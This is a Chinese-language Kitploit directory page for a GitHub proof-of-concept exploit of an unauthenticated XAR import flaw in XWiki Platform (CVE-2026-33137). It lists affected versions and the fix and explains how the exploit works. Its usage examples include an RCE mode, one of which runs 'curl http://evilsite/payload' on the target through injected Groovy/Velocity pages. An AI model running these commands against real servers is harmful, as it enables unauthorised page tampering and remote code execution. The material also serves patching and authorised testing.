Skip to content
KitploitKITPLOIT
工具漏洞利用博客
Log in
提交
工具漏洞利用博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - 通过 REST /wikis/{wikiName} 进行未认证的 XAR 导入 | Kitploit
工具/GitHubGitHub/portbuster1337/cve-2026-33137
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用渗透测试学习与教育红队
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - 通过 REST /wikis/{wikiName} 进行未认证的 XAR 导入

查看仓库
474个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-33137

XWiki Platform - 通过 REST /wikis/{wikiName} 实现未认证的 XAR 导入

描述

XWiki Platform 中的 POST /wikis/{wikiName} REST API 端点会执行 XAR(XWiki Archive)导入,且不进行任何身份验证或授权检查。未认证的攻击者可以通过发送精心构造的 XAR 文件,在目标 wiki 中创建或更新任意文档。

  • CVE:CVE-2026-33137
  • CWE:CWE-862 缺失授权
  • CVSS 4.0:9.3(严重)- AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • 发布时间:2026-05-20

受影响版本

状态版本
受影响> 15.10.16, > 16.4.6, > 16.10.2
已修复16.10.17, 17.4.9, 17.10.3, 18.1.0-rc-1

影响

未认证的攻击者可以:

  • 创建具有任意内容的任意 wiki 页面
  • 覆盖现有 wiki 页面
  • 通过创建包含恶意 Velocity/Groovy 脚本的页面,可能实现 RCE(如果已启用脚本功能)

详细信息

REST 端点 POST /xwiki/rest/wikis/{wikiName} 接受请求体中的 XAR 文件,并将其直接导入 wiki,而不会检查请求者是否具有 ADMIN 权限。修复(提交 4b7b95b)通过使用 ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...) 增加了授权检查。

PoC 用法

# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

RCE 模式(--rce)

--rce 标志会导入包含 Groovy 和 Velocity 有效负载的页面,这些负载会执行指定的命令字符串。它会自动:

  1. 运行预检检查(版本检测、漏洞状态、XAR 端点测试、触发路径可访问性)
  2. 导入将用户指定命令嵌入 {{groovy}} 和 {{velocity}} 宏中的页面
  3. 尝试通过 REST API、Web UI 和 SSTI 风格注入进行渲染
  4. 报告哪些触发路径可访问、哪些被阻止

成功实现 RCE 的条件:

  • 目标必须允许访客查看页面(或通过 -u / --password 提供凭据)
  • 查看用户必须启用脚本/编程权限
  • 触发路径不得被身份验证重定向阻止

漏洞利用原理

  1. 构建一个包含以下内容的最小化 XAR(ZIP)文件:
    • package.xml - 包描述符
    • {Space}/{Page}.xml - 包含内容的文档 XML
  2. 将 XAR 字节 POST 到易受攻击的端点
  3. 如果存在漏洞,文档将在无需身份验证的情况下被创建
  4. 可选地通过回读文档元数据进行验证

免责声明

此 PoC 仅用于教育和授权的安全测试目的。对您不拥有或未经明确许可测试的系统使用此漏洞利用程序是非法的。作者不对因使用本软件而造成的任何误用或损害负责。

参考资料

  • GitHub 安全公告 GHSA-qrvh-r3f2-9h4r
  • 提交 4b7b95b(修复)
  • JIRA XWIKI-23953
  • NVD 条目
下载工具